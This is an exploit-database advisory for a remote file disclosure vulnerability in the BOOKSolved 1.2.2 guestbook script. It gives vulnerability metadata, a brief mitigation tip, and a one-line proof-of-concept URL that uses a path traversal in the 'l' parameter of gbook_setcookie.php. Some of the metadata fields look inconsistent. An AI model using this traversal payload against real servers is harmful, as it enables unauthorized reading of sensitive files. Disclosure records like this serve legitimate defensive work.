BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability

vendor:

BOOKSolved

by:

bd0rk

7.5

CVSS

HIGH

Remote File Disclosure

434

CWE

Product Name: BOOKSolved

Affected Version From: 1.2.2002

Affected Version To: 1.2.2002

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu-Linux

2020

BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability

An attacker can read in sensitive files about l-parameter by exploiting vulnerable code in gbook_setcookie.php line 7.

Mitigation:

Percolate the l-parameter before $_GET

Source

Exploit-DB raw data:

...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability

...Discovered by bd0rk

...Contact: bd0rk[at]hackermail.com or follow me on twitter

...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King 

...Tested on: Ubuntu-Linux

...MEZ-Time: 08:17

...Vendor: http://www.usolved.net/

...Download: http://www.usolved.net/scripts/booksolved_v1.2.2.zip

----------------------------------------------------------------------------

PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php

----------------------------------------------------------------------------

Description: Found vulnerable code in gbook_setcookie.php line 7.
             So an attacker can read in sensitive files about l-parameter.


bd0rk's-Fixtip: Percolate the l-parameter before $_GET 



Greetings from Germany, the 22 years old bd0rk.